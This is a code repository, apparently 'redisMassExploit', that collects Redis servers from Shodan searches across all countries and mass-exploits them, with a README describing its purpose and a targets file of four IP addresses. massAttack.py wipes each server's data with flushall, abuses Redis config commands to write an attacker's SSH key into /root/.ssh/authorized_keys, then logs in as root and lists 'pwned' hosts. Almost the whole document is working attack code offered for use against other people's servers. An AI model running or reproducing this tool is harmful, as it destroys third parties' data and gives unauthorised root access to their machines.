├── .gitignore ├── README.md ├── massAttack.py ├── shodanCollector.py └── targets /.gitignore: -------------------------------------------------------------------------------- 1 | foo.txt 2 | id_rsa 3 | id_rsa.pub 4 | promisingTargets.txt 5 | pwnedTargets.txt 6 | targets 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # redisMassExploit 2 | Some handy script to collect hosts installed redis (using Shodan search engine) and exploit them 3 | 4 | Requirements: `requests` and `paramiko` python modules, `redis-cli` program 5 | 6 | ##How to use 7 | Using shodanCollector first to get a list of hosts installed redis (can collect more than 3000 IP at my execution time). 8 | (I remove most of the hosts in this repo due to security concern) 9 | 10 | Copy the archieved IP list to the "targets" file (in proper format) and run massAttack!!! 11 | 12 | For further information and workaround, please take a look on [my post](https://medium.com/@giaplvk57/pwn-a-bunch-of-servers-using-a-redis-misconfiguration-and-shodan-search-engine-eaeeb2a1a14c#.vp18yclvg "Pwn a bunch of servers via a Redis misconfiguration and the Shodan search engine") in medium. 13 | -------------------------------------------------------------------------------- /massAttack.py: -------------------------------------------------------------------------------- 1 | __author__ = 'Zik' 2 | import subprocess 3 | import socket 4 | import paramiko 5 | 6 | def run_command(command): 7 | try: 8 | out_bytes = subprocess.check_output(command, shell = True) 9 | # out_text = out_bytes.decode('utf-8') 10 | except subprocess.CalledProcessError as e: 11 | out_bytes = e.output # Output generated before error 12 | code = e.returncode # Return code 13 | return out_bytes 14 | 15 | def gererateRSAKey(passphrase): 16 | run_command('rm -rf ./id_rsa ./id_rsa.pub') 17 | print run_command('ssh-keygen -t rsa -C "crackRedis" -f ./id_rsa -P {0}'.format(passphrase)) 18 | run_command('(echo "\\n\\n"; cat ./id_rsa.pub; echo "\\n\\n") > foo.txt') 19 | 20 | def attack(target): 21 | print 'Attack the target: ' + target 22 | print 'Flush all the old data...' 23 | print run_command('redis-cli -h {0} flushall'.format(target)) 24 | print 'Push key data to the memory...' 25 | print run_command('cat ./foo.txt | redis-cli -h {0} -x set crackit'.format(target)) 26 | print 'Set the /root/.ssh/ to current directory...' 27 | print run_command('redis-cli -h {0} config set dir /root/.ssh/'.format(target)) 28 | print 'Get the current dir...' 29 | print run_command('redis-cli -h {0} config get dir'.format(target)) 30 | print 'Set key data to authorized_keys database key..' 31 | print run_command('redis-cli -h {0} config set dbfilename "authorized_keys"'.format(target)) 32 | print 'Write key data to authorized_keys file...' 33 | print run_command('redis-cli -h {0} save'.format(target)) 34 | 35 | def findPromisingTarget(targets): 36 | promisingTargets = [] 37 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | for target in targets: 39 | command = 'redis-cli -h {0} config set dir /root/.ssh/'.format(target) 40 | if run_command(command).find('OK') != -1: 41 | print '------------------------------------------------------' 42 | print 'Successfully access /root/.ssh/ on ' + target 43 | print 'Test the SSH port of ' + target 44 | try: 45 | s.connect((target, 22)) 46 | print "Success!!!" 47 | s.close() 48 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | promisingTargets.append(target) 50 | writeToFile('promisingTargets.txt', target) 51 | print "Number of promising target: " + str(len(promisingTargets)) 52 | except socket.error as e: 53 | print "Error on connect: %s" % e 54 | print '------------------------------------------------------' 55 | s.close() 56 | return promisingTargets 57 | 58 | def SSHConnect(target, passphrase): 59 | ssh = paramiko.SSHClient() 60 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 61 | try: 62 | ssh.connect(target, username='root', password=passphrase, key_filename='./id_rsa') 63 | stdin, stdout, stderr = ssh.exec_command('ls /') 64 | print stdout.readlines() 65 | ssh.close() 66 | return True 67 | except Exception as e: 68 | print e 69 | return False 70 | 71 | def writeToFile(filename, content): 72 | target = open(filename, 'a') 73 | target.write(content) 74 | target.write("\n") 75 | target.close() 76 | 77 | def main(): 78 | print '-------------------------GENERATE SSH KEY FILES-------------------------' 79 | passphrase = raw_input('Enter a file passphrase for SSH key: ') 80 | gererateRSAKey(passphrase) 81 | print '------------------------------------------------------------------------' 82 | 83 | print '------------------------FINDING PROMISING TARGETS-----------------------' 84 | targets = [line.rstrip('\r\n') for line in open('targets')] 85 | promisingTargets = findPromisingTarget(targets) 86 | print '------------------------------------------------------------------------' 87 | 88 | print '------------------------ATTACK PROMISING TARGETS------------------------' 89 | pwnedTargets = [] 90 | for promisingTarget in promisingTargets: 91 | print '------------------------------------------------------' 92 | attack(promisingTarget) 93 | print 'Try to connect to target using SSH connection' 94 | if SSHConnect(promisingTarget, passphrase) == True: 95 | pwnedTargets.append(promisingTarget) 96 | writeToFile('pwnedTargets.txt', promisingTarget) 97 | print '------------------------------------------------------' 98 | print '-------------------------------------------------------------------------' 99 | 100 | print '---------------------------------SUMMARY---------------------------------' 101 | print 'TOTAL CHECKED TARGETS: {0}'.format(len(targets)) 102 | print 'TOTAL PROMISING TARGETS: {0}'.format(len(promisingTargets)) 103 | print 'TOTAL PWNED TARGETS: {0}'.format(len(pwnedTargets)) 104 | print 'LIST OF ALL PWNED TARGETS:' 105 | for pwnedTarget in pwnedTargets: 106 | print pwnedTarget 107 | print 'Have a nice day!!!' 108 | print '-------------------------------------------------------------------------' 109 | if __name__ == "__main__": 110 | main() -------------------------------------------------------------------------------- /shodanCollector.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | def getAuthCookies(username, password): 5 | url = 'https://account.shodan.io/login' 6 | data = {'username': username, 'password': password, 'grant_type': 'password', 'login_submit': 'Log in'} 7 | session = requests.Session() 8 | response = session.post(url, data = data) 9 | return session.cookies.get_dict() 10 | 11 | redisVersions = [':2.0', ':2.1', ':2.2', ':2.3', ':2.4', ':2.5', ':2.6', ':2.7', ':2.8', ':2.9', ':3.0', ':3.1', ':3.2', ':', ''] 12 | countryList = ['AF', 'AL', 'DZ', 'AS', 'AD', 'AO', 'AI', 'AQ', 'AG', 'AR', 'AM', 'AW', 'AU', 'AT', 'AZ', 'BS', 'BH', 'BD', 'BB', 'BY', 'BE', 'BZ', 'BJ', 'BM', 'BT', 'BO', 'BQ', 'BA', 'BW', 'BV', 'BR', 'IO', 'BN', 'BG', 'BF', 'BI', 'KH', 'CM', 'CA', 'CV', 'KY', 'CF', 'TD', 'CL', 'CN', 'CX', 'CC', 'CO', 'KM', 'CG', 'CD', 'CK', 'CR', 'HR', 'CU', 'CW', 'CY', 'CZ', 'CI', 'DK', 'DJ', 'DM', 'DO', 'EC', 'EG', 'SV', 'GQ', 'ER', 'EE', 'ET', 'FK', 'FO', 'FJ', 'FI', 'FR', 'GF', 'PF', 'TF', 'GA', 'GM', 'GE', 'DE', 'GH', 'GI', 'GR', 'GL', 'GD', 'GP', 'GU', 'GT', 'GG', 'GN', 'GW', 'GY', 'HT', 'HM', 'VA', 'HN', 'HK', 'HU', 'IS', 'IN', 'ID', 'IR', 'IQ', 'IE', 'IM', 'IL', 'IT', 'JM', 'JP', 'JE', 'JO', 'KZ', 'KE', 'KI', 'KP', 'KR', 'KW', 'KG', 'LA', 'LV', 'LB', 'LS', 'LR', 'LY', 'LI', 'LT', 'LU', 'MO', 'MK', 'MG', 'MW', 'MY', 'MV', 'ML', 'MT', 'MH', 'MQ', 'MR', 'MU', 'YT', 'MX', 'FM', 'MD', 'MC', 'MN', 'ME', 'MS', 'MA', 'MZ', 'MM', 'NA', 'NR', 'NP', 'NL', 'NC', 'NZ', 'NI', 'NE', 'NG', 'NU', 'NF', 'MP', 'NO', 'OM', 'PK', 'PW', 'PS', 'PA', 'PG', 'PY', 'PE', 'PH', 'PN', 'PL', 'PT', 'PR', 'QA', 'RO', 'RU', 'RW', 'RE', 'BL', 'SH', 'KN', 'LC', 'MF', 'PM', 'VC', 'WS', 'SM', 'ST', 'SA', 'SN', 'RS', 'SC', 'SL', 'SG', 'SX', 'SK', 'SI', 'SB', 'SO', 'ZA', 'GS', 'SS', 'ES', 'LK', 'SD', 'SR', 'SJ', 'SZ', 'SE', 'CH', 'SY', 'TW', 'TJ', 'TZ', 'TH', 'TL', 'TG', 'TK', 'TO', 'TT', 'TN', 'TR', 'TM', 'TC', 'TV', 'UG', 'UA', 'AE', 'GB', 'US', 'UM', 'UY', 'UZ', 'VU', 'VE', 'VN', 'VG', 'VI', 'WF', 'EH', 'YE', 'ZM', 'ZW', 'AX'] 13 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'} 14 | 15 | username = raw_input("YOUR SHODAN ACCOUNT USERNAME: ") 16 | password = raw_input("YOUR SHODAN ACCOUNT PASSWORD: ") 17 | cookies = getAuthCookies(username, password) 18 | worldIPList = [] 19 | 20 | for redisVersion in redisVersions: 21 | print '------------------LOOKING FOR REDIS VERSION {0}------------------'.format(redisVersion) 22 | for country in countryList: 23 | for page in range(1,6): 24 | url = 'https://www.shodan.io/search?query=redis_version{0} country:"{1}"&page={2}'.format(redisVersion, country, page) 25 | r = requests.get(url, headers=headers, cookies=cookies) 26 | content = r.text 27 | 28 | countryIPList = re.findall(r'', content) 29 | if countryIPList == []: 30 | print 'Not found any IP in {0} at page {1}'.format(country, page) 31 | break 32 | else: 33 | print countryIPList 34 | print 'Found {0} IP from {1} in page {2}'.format(len(countryIPList), country, page) 35 | for IP in countryIPList: 36 | if IP not in worldIPList: 37 | worldIPList.append(IP) 38 | print 'Total number of IP: {0}'.format(len(worldIPList)) 39 | print 'WORLD IP NUMBER AFTER FINDING REDIS VERSION {0}'.format(len(redisVersion)) 40 | print worldIPList 41 | print '------------------LOOKING FOR REDIS VERSION {0}------------------'.format(redisVersion) 42 | print worldIPList -------------------------------------------------------------------------------- /targets: -------------------------------------------------------------------------------- 1 | 104.131.53.7 2 | 153.92.126.24 3 | 23.95.25.245 4 | 42.96.189.34 --------------------------------------------------------------------------------